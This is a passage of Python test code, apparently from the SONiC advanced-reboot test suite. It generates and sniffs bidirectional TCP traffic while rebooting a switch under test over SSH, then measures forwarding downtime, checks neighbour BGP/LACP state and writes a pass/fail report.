self.log("ARP ping: src idx %d port %d mac %s addr %s" % (src_idx, src_port, src_mac, src_addr))
self.log("ARP ping: dst idx %d port %d addr %s" % (dst_idx, dst_port, dst_addr))
self.arp_ping = str(packet)
self.arp_resp = Mask(expect)
self.arp_resp.set_do_not_care_scapy(scapy.Ether, 'src')
self.arp_resp.set_do_not_care_scapy(scapy.ARP, 'hwtype')
self.arp_resp.set_do_not_care_scapy(scapy.ARP, 'hwsrc')
self.arp_src_port = src_port
def generate_bidirectional(self):
"""
This method pre-generates the list of packets to be sent in a background thread.
Packets are composed into a list representing a bidirectional flow:
every fifth packet is sent from the vlan side, the rest are sent from T1.
Each packet carries a sequential TCP payload, so it can be identified later.
"""
self.send_interval = self.time_to_listen / self.packets_to_send
self.packets_list = []
from_t1_iter = itertools.cycle(self.from_t1)
for i in xrange(self.packets_to_send):
payload = '0' * 60 + str(i)
if (i % 5) == 0 : # From vlan to T1.
packet = scapyall.Ether(self.from_vlan_packet)
packet.load = payload
from_port = self.from_server_src_port
else: # From T1 to vlan.
src_port, packet = next(from_t1_iter)
packet = scapyall.Ether(packet)
packet.load = payload
from_port = src_port
self.packets_list.append((from_port, str(packet)))
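# Payload format illustration: packet i carries '0' * 60 + str(i), so e.g.
# int('0' * 60 + '42') == 42 - this is how check_tcp_payload() and
# examine_flow() below recover the sequence number from a sniffed packet.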
def put_nowait(self, queue, data):
try:
queue.put_nowait(data)
except Queue.Full:
pass
def pre_reboot_test_setup(self):
self.reboot_start = None
self.no_routing_start = None
self.no_routing_stop = None
self.no_cp_replies = None
self.upper_replies = []
self.routing_always = False
self.ssh_jobs = []
for addr in self.ssh_targets:
q = Queue.Queue(1)
thr = threading.Thread(target=self.peer_state_check, kwargs={'ip': addr, 'queue': q})
thr.setDaemon(True)
self.ssh_jobs.append((thr, q))
thr.start()
if self.setup_fdb_before_test:
self.log("Run some server traffic to populate FDB table...")
self.setup_fdb()
self.log("Starting reachability state watch thread...")
self.watching = True
self.light_probe = False
self.watcher_is_stopped = threading.Event() # Waiter Event for the Watcher state is stopped.
self.watcher_is_running = threading.Event() # Waiter Event for the Watcher state is running.
self.watcher_is_stopped.set() # By default the Watcher is not running.
self.watcher_is_running.clear() # By default its required to wait for the Watcher started.
# Give watch thread some time to wind up
watcher = self.pool.apply_async(self.reachability_watcher)
time.sleep(5)
def get_warmboot_finalizer_state(self):
stdout, stderr, _ = self.dut_connection.execCommand('sudo systemctl is-active warmboot-finalizer.service')
if not stdout:
self.log('Finalizer state not returned from DUT')
return ''
if stderr:
self.fails['dut'].add("stderr from DUT while collecting Finalizer state: %s" % (str(stderr)))
finalizer_state = stdout[0].strip()
return finalizer_state
def get_now_time(self):
stdout, stderr, _ = self.dut_connection.execCommand('date +"%Y-%m-%d %H:%M:%S"')
if not stdout:
self.fails['dut'].add('Error collecting current date from DUT: empty value returned')
raise Exception('Error collecting current date from DUT: empty value returned')
if stderr:
self.fails['dut'].add("Error collecting current date from DUT: %s" % (str(stderr)))
raise Exception('Error collecting current date from DUT: empty value returned')
return datetime.datetime.strptime(stdout[0].strip(), "%Y-%m-%d %H:%M:%S")
def check_warmboot_finalizer(self):
dut_datetime = self.get_now_time()
self.log('waiting for warmboot-finalizer service to become activating')
finalizer_state = self.get_warmboot_finalizer_state()
warm_up_timeout_secs = int(self.test_params['warm_up_timeout_secs'])
finalizer_timeout = 60 + self.test_params['reboot_limit_in_seconds']
while finalizer_state != 'activating':
dut_datetime_after_ssh = self.get_now_time()
time_passed = float(dut_datetime_after_ssh.strftime("%s")) - float(dut_datetime.strftime("%s"))
if time_passed > finalizer_timeout:
self.fails['dut'].add('warmboot-finalizer never reached state "activating"')
raise TimeoutError
time.sleep(1)
finalizer_state = self.get_warmboot_finalizer_state()
self.log('waiting for warmboot-finalizer service to finish')
finalizer_state = self.get_warmboot_finalizer_state()
self.log('warmboot finalizer service state {}'.format(finalizer_state))
count = 0
while finalizer_state == 'activating':
finalizer_state = self.get_warmboot_finalizer_state()
self.log('warmboot finalizer service state {}'.format(finalizer_state))
time.sleep(10)
if count * 10 > warm_up_timeout_secs:
self.fails['dut'].add('warmboot-finalizer.service did not finish')
raise TimeoutError
count += 1
self.log('warmboot-finalizer service finished')
def wait_until_reboot(self):
self.log("Wait until Control plane is down")
self.timeout(self.wait_until_cpu_port_down, self.task_timeout, "DUT hasn't shutdown in {} seconds".format(self.task_timeout))
if self.reboot_type == 'fast-reboot':
self.light_probe = True
else:
# add or del routes during boot
self.do_inboot_oper()
self.reboot_start = datetime.datetime.now()
self.log("Dut reboots: reboot start %s" % str(self.reboot_start))
def handle_fast_reboot_health_check(self):
self.log("Check that device is still forwarding data plane traffic")
self.fails['dut'].add("Data plane has a forwarding problem after CPU went down")
self.check_alive()
self.fails['dut'].clear()
self.log("Wait until control plane up")
port_up_signal = multiprocessing.Event()
async_cpu_up = self.pool.apply_async(self.wait_until_cpu_port_up, args=(port_up_signal,))
self.log("Wait until data plane stops")
forward_stop_signal = multiprocessing.Event()
async_forward_stop = self.pool.apply_async(self.check_forwarding_stop, args=(forward_stop_signal,))
try:
async_cpu_up.get(timeout=self.task_timeout)
except TimeoutError as e:
port_up_signal.set()
self.log("DUT hasn't bootup in %d seconds" % self.task_timeout)
self.fails['dut'].add("DUT hasn't booted up in %d seconds" % self.task_timeout)
raise
try:
self.no_routing_start, self.upper_replies = async_forward_stop.get(timeout=self.task_timeout)
self.log("Data plane was stopped, Waiting until it's up. Stop time: %s" % str(self.no_routing_start))
except TimeoutError:
forward_stop_signal.set()
self.log("Data plane never stop")
self.routing_always = True
self.upper_replies = [self.nr_vl_pkts]
if self.no_routing_start is not None:
self.no_routing_stop, _ = self.timeout(self.check_forwarding_resume,
self.task_timeout,
"DUT hasn't started to work for %d seconds" % self.task_timeout)
else:
self.no_routing_stop = datetime.datetime.min
self.no_routing_start = datetime.datetime.min
# Stop watching DUT
self.watching = False
def handle_warm_reboot_health_check(self):
self.send_and_sniff()
# Stop watching DUT
self.watching = False
self.log("Stopping reachability state watch thread.")
self.watcher_is_stopped.wait(timeout = 10) # Wait for the Watcher stopped.
self.save_sniffed_packets()
examine_start = datetime.datetime.now()
self.log("Packet flow examine started %s after the reboot" % str(examine_start - self.reboot_start))
self.examine_flow()
self.log("Packet flow examine finished after %s" % str(datetime.datetime.now() - examine_start))
if self.lost_packets:
self.no_routing_stop, self.no_routing_start = datetime.datetime.fromtimestamp(self.no_routing_stop), datetime.datetime.fromtimestamp(self.no_routing_start)
self.log("The longest disruption lasted %.3f seconds. %d packet(s) lost." % (self.max_disrupt_time, self.max_lost_id))
self.log("Total disruptions count is %d. All disruptions lasted %.3f seconds. Total %d packet(s) lost" % \
(self.disrupts_count, self.total_disrupt_time, self.total_disrupt_packets))
else:
self.no_routing_start = self.reboot_start
self.no_routing_stop = self.reboot_start
def handle_post_reboot_health_check(self):
# wait until all bgp session are established
self.log("Wait until bgp routing is up on all devices")
for _, q in self.ssh_jobs:
q.put('quit')
def wait_for_ssh_threads(signal):
while any(thr.is_alive() for thr, _ in self.ssh_jobs) and not signal.is_set():
self.log('Waiting till SSH threads stop')
time.sleep(self.TIMEOUT)
for thr, _ in self.ssh_jobs:
thr.join()
self.timeout(wait_for_ssh_threads, self.task_timeout, "SSH threads haven't finished for %d seconds" % self.task_timeout)
self.log("Data plane works again. Start time: %s" % str(self.no_routing_stop))
self.log("")
if self.no_routing_stop - self.no_routing_start > self.limit:
self.fails['dut'].add("Longest downtime period must be less then %s seconds. It was %s" \
% (self.test_params['reboot_limit_in_seconds'], str(self.no_routing_stop - self.no_routing_start)))
if self.no_routing_stop - self.reboot_start > datetime.timedelta(seconds=self.test_params['graceful_limit']):
self.fails['dut'].add("%s cycle must be less than graceful limit %s seconds" % (self.reboot_type, self.test_params['graceful_limit']))
if 'warm-reboot' in self.reboot_type:
if self.total_disrupt_time > self.limit.total_seconds():
self.fails['dut'].add("Total downtime period must be less then %s seconds. It was %s" \
% (str(self.limit), str(self.total_disrupt_time)))
# after the data plane is up, check for routing changes
if self.test_params['inboot_oper'] and self.sad_handle:
self.check_inboot_sad_status()
# postboot check for all preboot operations
if self.test_params['preboot_oper'] and self.sad_handle:
self.check_postboot_sad_status()
else:
# verify there are no interface flaps after warm boot
self.neigh_lag_status_check()
if self.reboot_type == 'fast-reboot':
self.no_cp_replies = self.extract_no_cpu_replies(self.upper_replies)
if self.no_cp_replies < 0.95 * self.nr_vl_pkts:
self.fails['dut'].add("Dataplane didn't route to all servers, when control-plane was down: %d vs %d" % (self.no_cp_replies, self.nr_vl_pkts))
def handle_advanced_reboot_health_check_kvm(self):
self.log("Wait until data plane stops")
forward_stop_signal = multiprocessing.Event()
async_forward_stop = self.pool.apply_async(self.check_forwarding_stop, args=(forward_stop_signal,))
self.log("Wait until control plane up")
port_up_signal = multiprocessing.Event()
async_cpu_up = self.pool.apply_async(self.wait_until_cpu_port_up, args=(port_up_signal,))
try:
self.no_routing_start, _ = async_forward_stop.get(timeout=self.task_timeout)
self.log("Data plane was stopped, Waiting until it's up. Stop time: %s" % str(self.no_routing_start))
except TimeoutError:
forward_stop_signal.set()
self.log("Data plane never stop")
try:
async_cpu_up.get(timeout=self.task_timeout)
no_control_stop = self.cpu_state.get_state_time('up')
self.log("Control plane down stops %s" % str(no_control_stop))
except TimeoutError as e:
port_up_signal.set()
self.log("DUT hasn't bootup in %d seconds" % self.task_timeout)
self.fails['dut'].add("DUT hasn't booted up in %d seconds" % self.task_timeout)
raise
# Wait until data plane up if it stopped
if self.no_routing_start is not None:
self.no_routing_stop, _ = self.timeout(self.check_forwarding_resume,
self.task_timeout,
"DUT hasn't started to work for %d seconds" % self.task_timeout)
else:
self.no_routing_stop = datetime.datetime.min
self.no_routing_start = datetime.datetime.min
# Stop watching DUT
self.watching = False
def handle_post_reboot_health_check_kvm(self):
# wait until all bgp session are established
self.log("Wait until bgp routing is up on all devices")
for _, q in self.ssh_jobs:
q.put('quit')
def wait_for_ssh_threads(signal):
while any(thr.is_alive() for thr, _ in self.ssh_jobs) and not signal.is_set():
time.sleep(self.TIMEOUT)
for thr, _ in self.ssh_jobs:
thr.join()
self.timeout(wait_for_ssh_threads, self.task_timeout, "SSH threads haven't finished for %d seconds" % self.task_timeout)
self.log("Data plane works again. Start time: %s" % str(self.no_routing_stop))
self.log("")
if self.no_routing_stop - self.no_routing_start > self.limit:
self.fails['dut'].add("Longest downtime period must be less then %s seconds. It was %s" \
% (self.test_params['reboot_limit_in_seconds'], str(self.no_routing_stop - self.no_routing_start)))
if self.no_routing_stop - self.reboot_start > datetime.timedelta(seconds=self.test_params['graceful_limit']):
self.fails['dut'].add("%s cycle must be less than graceful limit %s seconds" % (self.reboot_type, self.test_params['graceful_limit']))
def handle_post_reboot_test_reports(self):
# Stop watching DUT
self.watching = False
# revert to pretest state
if self.sad_oper and self.sad_handle:
self.sad_revert()
if self.test_params['inboot_oper']:
self.check_postboot_sad_status()
self.log(" ")
# Generating report
self.log("="*50)
self.log("Report:")
self.log("="*50)
self.log("LACP/BGP were down for (extracted from cli):")
self.log("-"*50)
for ip in sorted(self.cli_info.keys()):
self.log(" %s - lacp: %7.3f (%d) po_events: (%d) bgp v4: %7.3f (%d) bgp v6: %7.3f (%d)" \
% (ip, self.cli_info[ip]['lacp'][1], self.cli_info[ip]['lacp'][0], \
self.cli_info[ip]['po'][1], \
self.cli_info[ip]['bgp_v4'][1], self.cli_info[ip]['bgp_v4'][0],\
self.cli_info[ip]['bgp_v6'][1], self.cli_info[ip]['bgp_v6'][0]))
self.log("-"*50)
self.log("Extracted from VM logs:")
self.log("-"*50)
for ip in sorted(self.logs_info.keys()):
self.log("Extracted log info from %s" % ip)
for msg in sorted(self.logs_info[ip].keys()):
if not msg in [ 'error', 'route_timeout' ]:
self.log(" %s : %d" % (msg, self.logs_info[ip][msg]))
else:
self.log(" %s" % self.logs_info[ip][msg])
self.log("-"*50)
self.log("Summary:")
self.log("-"*50)
if self.no_routing_stop:
self.log("Longest downtime period was %s" % str(self.no_routing_stop - self.no_routing_start))
reboot_time = "0:00:00" if self.routing_always else str(self.no_routing_stop - self.reboot_start)
self.log("Reboot time was %s" % reboot_time)
self.log("Expected downtime is less then %s" % self.limit)
if self.reboot_type == 'fast-reboot' and self.no_cp_replies:
self.log("How many packets were received back when control plane was down: %d Expected: %d" % (self.no_cp_replies, self.nr_vl_pkts))
has_info = any(len(info) > 0 for info in self.info.values())
if has_info:
self.log("-"*50)
self.log("Additional info:")
self.log("-"*50)
for name, info in self.info.items():
for entry in info:
self.log("INFO:%s:%s" % (name, entry))
self.log("-"*50)
is_good = all(len(fails) == 0 for fails in self.fails.values())
errors = ""
if not is_good:
self.log("-"*50)
self.log("Fails:")
self.log("-"*50)
errors = "\n\nSomething went wrong. Please check output below:\n\n"
for name, fails in self.fails.items():
for fail in fails:
self.log("FAILED:%s:%s" % (name, fail))
errors += "FAILED:%s:%s\n" % (name, fail)
self.log("="*50)
self.report = {
"downtime": (self.no_routing_stop - self.no_routing_start).total_seconds(),
"reboot_time": "0:00:00" if self.no_routing_stop and self.routing_always \
else (self.no_routing_stop - self.reboot_start).total_seconds()
}
with open(self.report_file_name, 'w') as reportfile:
json.dump(self.report, reportfile)
self.assertTrue(is_good, errors)
def runTest(self):
self.pre_reboot_test_setup()
try:
self.log("Check that device is alive and pinging")
self.fails['dut'].add("DUT is not ready for test")
self.wait_dut_to_warm_up()
self.fails['dut'].clear()
self.log("Schedule to reboot the remote switch in %s sec" % self.reboot_delay)
thr = threading.Thread(target=self.reboot_dut)
thr.setDaemon(True)
thr.start()
if 'warm-reboot' in self.reboot_type:
thr = threading.Thread(target=self.check_warmboot_finalizer)
thr.setDaemon(True)
thr.start()
self.wait_until_reboot()
if self.kvm_test:
self.handle_advanced_reboot_health_check_kvm()
self.handle_post_reboot_health_check_kvm()
else:
if self.reboot_type == 'fast-reboot':
self.handle_fast_reboot_health_check()
if 'warm-reboot' in self.reboot_type:
self.handle_warm_reboot_health_check()
self.handle_post_reboot_health_check()
# Check sonic version after reboot
self.check_sonic_version_after_reboot()
except Exception as e:
self.fails['dut'].add(e)
finally:
self.handle_post_reboot_test_reports()
def neigh_lag_status_check(self):
"""
Ensure there are no interface flaps after warm-boot
"""
for neigh in self.ssh_targets:
self.neigh_handle = Arista(neigh, None, self.test_params)
self.neigh_handle.connect()
fails, flap_cnt = self.neigh_handle.verify_neigh_lag_no_flap()
self.neigh_handle.disconnect()
self.fails[neigh] |= fails
if not flap_cnt:
self.log("No LAG flaps seen on %s after warm boot" % neigh)
else:
self.fails[neigh].add("LAG flapped %s times on %s after warm boot" % (flap_cnt, neigh))
def check_sonic_version_after_reboot(self):
# Check sonic version after reboot
target_version = self.test_params['target_version']
if target_version:
stdout, stderr, return_code = self.dut_connection.execCommand("sudo sonic_installer list | grep Current | awk '{print $2}'")
current_version = ""
if stdout != []:
current_version = str(stdout[0]).replace('\n', '')
self.log("Current={} Target={}".format(current_version, target_version))
if current_version != target_version:
raise Exception("Sonic upgrade failed. Target={} Current={}".format(\
target_version, current_version))
def extract_no_cpu_replies(self, arr):
"""
This function tries to extract the number of replies from the dataplane while the control plane is not working
"""
# remove all zero values
non_zero = filter(lambda x : x > 0, arr)
# check that the last value is different from the previous one
if len(non_zero) > 1 and non_zero[-1] < non_zero[-2]:
return non_zero[-2]
else:
return non_zero[-1]
def reboot_dut(self):
time.sleep(self.reboot_delay)
self.log("Rebooting remote side")
stdout, stderr, return_code = self.dut_connection.execCommand("sudo " + self.reboot_type, timeout=30)
if stdout != []:
self.log("stdout from %s: %s" % (self.reboot_type, str(stdout)))
if stderr != []:
self.log("stderr from %s: %s" % (self.reboot_type, str(stderr)))
self.fails['dut'].add("{} failed with error {}".format(self.reboot_type, stderr))
thread.interrupt_main()
raise Exception("{} failed with error {}".format(self.reboot_type, stderr))
self.log("return code from %s: %s" % (self.reboot_type, str(return_code)))
# Note: a timeout reboot in ssh session will return a 255 code
if return_code not in [0, 255]:
thread.interrupt_main()
return
def cmd(self, cmds):
process = subprocess.Popen(cmds,
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return_code = process.returncode
return stdout, stderr, return_code
def peer_state_check(self, ip, queue):
self.log('SSH thread for VM {} started'.format(ip))
ssh = Arista(ip, queue, self.test_params, log_cb=self.log)
self.fails[ip], self.info[ip], self.cli_info[ip], self.logs_info[ip] = ssh.run()
self.log('SSH thread for VM {} finished'.format(ip))
def wait_until_cpu_port_down(self, signal):
while not signal.is_set():
for _, q in self.ssh_jobs:
self.put_nowait(q, 'cpu_down')
if self.cpu_state.get() == 'down':
break
time.sleep(self.TIMEOUT)
def wait_until_cpu_port_up(self, signal):
while not signal.is_set():
for _, q in self.ssh_jobs:
self.put_nowait(q, 'cpu_up')
if self.cpu_state.get() == 'up':
break
time.sleep(self.TIMEOUT)
def apply_filter_all_ports(self, filter_expression):
for p in self.dataplane.ports.values():
port = p.get_packet_source()
scapyall.attach_filter(port.socket, filter_expression)
def send_in_background(self, packets_list = None, interval = None):
"""
This method sends predefined list of packets with predefined interval.
"""
if not interval:
interval = self.send_interval
if not packets_list:
packets_list = self.packets_list
self.sniffer_started.wait(timeout=10)
with self.dataplane_io_lock:
# While running fast data plane sender thread there are two reasons for filter to be applied
# 1. filter out data plane traffic which is tcp to free up the load on PTF socket (sniffer thread is using a different one)
# 2. during warm neighbor restoration DUT will send a lot of ARP requests which we are not interested in
# This is essential to get stable results
self.apply_filter_all_ports('not (arp and ether src {}) and not tcp'.format(self.test_params['dut_mac']))
sender_start = datetime.datetime.now()
self.log("Sender started at %s" % str(sender_start))
for entry in packets_list:
time.sleep(interval)
if self.vnet:
testutils.send_packet(self, entry[0], entry[1].decode("base64"))
else:
testutils.send_packet(self, *entry)
self.log("Sender has been running for %s" % str(datetime.datetime.now() - sender_start))
# Remove filter
self.apply_filter_all_ports('')
def sniff_in_background(self, wait = None):
"""
This function listens on all ports, in both directions, for the TCP src=1234 dst=5000 packets, until timeout.
Once found, all packets are dumped to local pcap file,
and all packets are saved to self.packets as scapy type.
The native scapy.sniff() is used as a background thread, to allow a delayed start for send_in_background().
"""
if not wait:
wait = self.time_to_listen + self.test_params['sniff_time_incr']
sniffer_start = datetime.datetime.now()
self.log("Sniffer started at %s" % str(sniffer_start))
sniff_filter = "tcp and tcp dst port 5000 and tcp src port 1234 and not icmp"
scapy_sniffer = threading.Thread(target=self.scapy_sniff, kwargs={'wait': wait, 'sniff_filter': sniff_filter})
scapy_sniffer.start()
time.sleep(2) # Let the scapy sniff initialize completely.
self.sniffer_started.set() # Unblock waiter for the send_in_background.
scapy_sniffer.join()
self.log("Sniffer has been running for %s" % str(datetime.datetime.now() - sniffer_start))
self.sniffer_started.clear()
def save_sniffed_packets(self):
filename = "/tmp/capture_%s.pcap" % self.sad_oper if self.sad_oper is not None else "/tmp/capture.pcap"
if self.packets:
scapyall.wrpcap(filename, self.packets)
self.log("Pcap file dumped to %s" % filename)
else:
self.log("Pcap file is empty.")
def scapy_sniff(self, wait = 180, sniff_filter = ''):
"""
This method exploits native scapy sniff() method.
"""
self.packets = scapyall.sniff(timeout = wait, filter = sniff_filter)
def send_and_sniff(self):
"""
This method starts two background threads in parallel:
one for sending, another for collecting the sent packets.
"""
self.sender_thr = threading.Thread(target = self.send_in_background)
self.sniff_thr = threading.Thread(target = self.sniff_in_background)
self.sniffer_started = threading.Event() # Event for the sniff_in_background status.
self.sniff_thr.start()
self.sender_thr.start()
self.sniff_thr.join()
self.sender_thr.join()
def check_tcp_payload(self, packet):
"""
This method is used by the examine_flow() method.
It returns True if a packet is not corrupted and carries the valid sequential TCP payload created by the generate_bidirectional() method.
"""
try:
    # the payload must parse as an integer within [0, packets_to_send)
    return 0 <= int(str(packet[scapyall.TCP].payload)) < self.packets_to_send
except Exception:
    return False
def no_flood(self, packet):
"""
This method filters packets which are unique (i.e. no floods).
"""
if (not int(str(packet[scapyall.TCP].payload)) in self.unique_id) and (packet[scapyall.Ether].src == self.dut_mac):
# This is a unique (no flooded) received packet.
self.unique_id.append(int(str(packet[scapyall.TCP].payload)))
return True
elif packet[scapyall.Ether].dst == self.dut_mac:
# This is a sent packet.
return True
else:
return False
def examine_flow(self, filename = None):
"""
This method examines a pcap file (if given), or the self.packets scapy capture.
The method compares the TCP payloads of the packets one by one (assuming all payloads are consecutive integers),
and any losses found are treated as disruptions in dataplane forwarding.
All disruptions are saved to self.lost_packets dictionary, in format:
disrupt_start_id = (missing_packets_count, disrupt_time, disrupt_start_timestamp, disrupt_stop_timestamp)
"""
if filename:
all_packets = scapyall.rdpcap(filename)
elif self.packets:
all_packets = self.packets
else:
self.log("Filename and self.packets are not defined.")
self.fails['dut'].add("Filename and self.packets are not defined")
return None
# Filter out packets and remove floods:
self.unique_id = list() # This list will contain all unique Payload ID, to filter out received floods.
filtered_packets = [ pkt for pkt in all_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == 5000 and
self.check_tcp_payload(pkt) and
self.no_flood(pkt)
]
if self.vnet:
decap_packets = [ scapyall.Ether(str(pkt.payload.payload.payload)[8:]) for pkt in all_packets if
scapyall.UDP in pkt and
pkt[scapyall.UDP].sport == 1234
]
filtered_decap_packets = [ pkt for pkt in decap_packets if
scapyall.TCP in pkt and
not scapyall.ICMP in pkt and
pkt[scapyall.TCP].sport == 1234 and
pkt[scapyall.TCP].dport == 5000 and
self.check_tcp_payload(pkt) and
self.no_flood(pkt)
]
filtered_packets = filtered_packets + filtered_decap_packets
# Re-arrange packets, if delayed, by Payload ID and Timestamp:
packets = sorted(filtered_packets, key = lambda packet: (int(str(packet[scapyall.TCP].payload)), packet.time ))
self.lost_packets = dict()
self.max_disrupt, self.total_disruption = 0, 0
sent_packets = dict()
self.fails['dut'].add("Sniffer failed to capture any traffic")
self.assertTrue(packets, "Sniffer failed to capture any traffic")
self.fails['dut'].clear()
if packets:
prev_payload, prev_time = 0, 0
sent_payload = 0
received_counter = 0 # Counts packets from dut.
self.disruption_start, self.disruption_stop = None, None
for packet in packets:
if packet[scapyall.Ether].dst == self.dut_mac:
# This is a sent packet - keep track of it as payload_id:timestamp.
sent_payload = int(str(packet[scapyall.TCP].payload))
sent_packets[sent_payload] = packet.time
continue
if packet[scapyall.Ether].src == self.dut_mac:
# This is a received packet.
received_time = packet.time
received_payload = int(str(packet[scapyall.TCP].payload))
received_counter += 1
if not (received_payload and received_time):
# This is the first valid received packet.
prev_payload = received_payload
prev_time = received_time
continue
if received_payload - prev_payload > 1:
# Packets in a row are missing, a disruption.
lost_id = (received_payload -1) - prev_payload # How many packets lost in a row.
disrupt = (sent_packets[received_payload] - sent_packets[prev_payload + 1]) # How long disrupt lasted.
# Add disrupt to the dict:
self.lost_packets[prev_payload] = (lost_id, disrupt, received_time - disrupt, received_time)
self.log("Disruption between packet ID %d and %d. For %.4f " % (prev_payload, received_payload, disrupt))
if not self.disruption_start:
self.disruption_start = datetime.datetime.fromtimestamp(prev_time)
self.disruption_stop = datetime.datetime.fromtimestamp(received_time)
prev_payload = received_payload
prev_time = received_time
self.fails['dut'].add("Sniffer failed to filter any traffic from DUT")
self.assertTrue(received_counter, "Sniffer failed to filter any traffic from DUT")
self.fails['dut'].clear()
self.disrupts_count = len(self.lost_packets) # Total disrupt counter.
if self.lost_packets:
# Find the longest loss with the longest time:
max_disrupt_from_id, (self.max_lost_id, self.max_disrupt_time, self.no_routing_start, self.no_routing_stop) = \
max(self.lost_packets.items(), key = lambda item:item[1][0:2])
self.total_disrupt_packets = sum([item[0] for item in self.lost_packets.values()])
self.total_disrupt_time = sum([item[1] for item in self.lost_packets.values()])
self.log("Disruptions happen between %s and %s after the reboot." % \
(str(self.disruption_start - self.reboot_start), str(self.disruption_stop - self.reboot_start)))
else:
self.max_lost_id = 0
self.max_disrupt_time = 0
self.total_disrupt_packets = 0
self.total_disrupt_time = 0
self.log("Gaps in forwarding not found.")
self.log("Total incoming packets captured %d" % received_counter)
if packets:
filename = '/tmp/capture_filtered.pcap' if self.sad_oper is None else "/tmp/capture_filtered_%s.pcap" % self.sad_oper
scapyall.wrpcap(filename, packets)
self.log("Filtered pcap dumped to %s" % filename)
def check_forwarding_stop(self, signal):
self.asic_start_recording_vlan_reachability()
while not signal.is_set():
state = self.asic_state.get()
for _, q in self.ssh_jobs:
self.put_nowait(q, 'check_stop')
if state == 'down':
break
time.sleep(self.TIMEOUT)
self.asic_stop_recording_vlan_reachability()
return self.asic_state.get_state_time(state), self.get_asic_vlan_reachability()
def check_forwarding_resume(self, signal):
while not signal.is_set():
state = self.asic_state.get()
if state != 'down':
break
time.sleep(self.TIMEOUT)
return self.asic_state.get_state_time(state), self.get_asic_vlan_reachability()
def ping_data_plane(self, light_probe=True):
self.dataplane.flush()
replies_from_servers = self.pingFromServers()
if replies_from_servers > 0 or not light_probe:
replies_from_upper = self.pingFromUpperTier()
else:
replies_from_upper = 0
return replies_from_servers, replies_from_upper
def wait_dut_to_warm_up(self):
# When the DUT is freshly rebooted, it appears that it needs to warm
# up towards PTF docker. In practice, I've seen this warm up taking
# up to ~70 seconds.
fail = None
dut_stabilize_secs = int(self.test_params['dut_stabilize_secs'])
warm_up_timeout_secs = int(self.test_params['warm_up_timeout_secs'])
start_time = datetime.datetime.now()
up_time = None
# First wait until DUT data/control planes are up
while True:
dataplane = self.asic_state.get()
ctrlplane = self.cpu_state.get()
elapsed = (datetime.datetime.now() - start_time).total_seconds()
if dataplane == 'up' and ctrlplane == 'up':
if not up_time:
up_time = datetime.datetime.now()
up_secs = (datetime.datetime.now() - up_time).total_seconds()
if up_secs > dut_stabilize_secs:
break
else:
# reset up_time
up_time = None
            if elapsed > warm_up_timeout_secs:
                raise Exception("DUT data/control planes didn't come up within the warm up timeout")
time.sleep(1)
# check until flooding is over. Flooding happens when FDB entry of
# certain host is not yet learnt by the ASIC, therefore it sends
# packet to all vlan ports.
uptime = datetime.datetime.now()
while True:
elapsed = (datetime.datetime.now() - start_time).total_seconds()
if not self.asic_state.is_flooding() and elapsed > dut_stabilize_secs:
break
if elapsed > warm_up_timeout_secs:
if self.allow_vlan_flooding:
break
raise Exception("Data plane didn't stop flooding within warm up timeout")
time.sleep(1)
dataplane = self.asic_state.get()
ctrlplane = self.cpu_state.get()
if not dataplane == 'up':
fail = "Data plane"
elif not ctrlplane == 'up':
fail = "Control plane"
if fail is not None:
raise Exception("{} went down while waiting for flooding to stop".format(fail))
if self.asic_state.get_state_time('up') > uptime:
fail = "Data plane"
elif self.cpu_state.get_state_time('up') > uptime:
fail = "Control plane"
if fail is not None:
raise Exception("{} flapped while waiting for the warm up".format(fail))
# Everything is good
    def check_alive(self):
        # This function checks that the DUT routes packets in both directions.
        #
        # Sometimes the first attempt fails because ARP responses to the DUT are
        # not fast enough. But after that the function expects to see steady
        # "replies". If it sees an issue with the dataplane after successful
        # replies were already observed, it considers the DUT unhealthy.
        #
        # Sometimes the DUT returns more replies than requests, presumably
        # because the FDB table is not yet populated. The function waits until
        # the flooding is over.
uptime = None
for counter in range(self.nr_tests * 2):
state = self.asic_state.get()
if state == 'up':
if not uptime:
uptime = self.asic_state.get_state_time(state)
else:
if uptime:
raise Exception("Data plane stopped working")
time.sleep(2)
# wait, until FDB entries are populated
for _ in range(self.nr_tests * 10): # wait for some time
if self.asic_state.is_flooding():
time.sleep(2)
else:
break
else:
raise Exception("DUT is flooding")
def get_asic_vlan_reachability(self):
return self.asic_vlan_reach
def asic_start_recording_vlan_reachability(self):
with self.vlan_lock:
self.asic_vlan_reach = []
self.recording = True
def asic_stop_recording_vlan_reachability(self):
with self.vlan_lock:
self.recording = False
    def try_record_asic_vlan_reachability(self, t1_to_vlan):
with self.vlan_lock:
if self.recording:
self.asic_vlan_reach.append(t1_to_vlan)
def log_asic_state_change(self, reachable, partial=False, t1_to_vlan=0, flooding=False):
old = self.asic_state.get()
if reachable:
state = 'up' if not partial else 'partial'
else:
state = 'down'
        self.try_record_asic_vlan_reachability(t1_to_vlan)
self.asic_state.set_flooding(flooding)
if old != state:
self.log("Data plane state transition from %s to %s (%d)" % (old, state, t1_to_vlan))
self.asic_state.set(state)
def log_cpu_state_change(self, reachable, partial=False, flooding=False):
old = self.cpu_state.get()
if reachable:
state = 'up' if not partial else 'partial'
else:
state = 'down'
self.cpu_state.set_flooding(flooding)
if old != state:
self.log("Control plane state transition from %s to %s" % (old, state))
self.cpu_state.set(state)
def log_vlan_state_change(self, reachable):
old = self.vlan_state.get()
if reachable:
state = 'up'
else:
state = 'down'
if old != state:
self.log("VLAN ARP state transition from %s to %s" % (old, state))
self.vlan_state.set(state)
    def reachability_watcher(self):
        # This function watches the reachability of the CPU port and the ASIC,
        # and logs the state changes for future analysis.
        self.watcher_is_stopped.clear() # Mark the watcher as running.
while self.watching:
if self.dataplane_io_lock.acquire(False):
vlan_to_t1, t1_to_vlan = self.ping_data_plane(self.light_probe)
reachable = (t1_to_vlan > self.nr_vl_pkts * 0.7 and
vlan_to_t1 > self.nr_pc_pkts * 0.7)
partial = (reachable and
(t1_to_vlan < self.nr_vl_pkts or
vlan_to_t1 < self.nr_pc_pkts))
flooding = (reachable and
(t1_to_vlan > self.nr_vl_pkts or
vlan_to_t1 > self.nr_pc_pkts))
self.log_asic_state_change(reachable, partial, t1_to_vlan, flooding)
self.dataplane_io_lock.release()
total_rcv_pkt_cnt = self.pingDut()
reachable = total_rcv_pkt_cnt > 0 and total_rcv_pkt_cnt > self.ping_dut_pkts * 0.7
partial = total_rcv_pkt_cnt > 0 and total_rcv_pkt_cnt < self.ping_dut_pkts
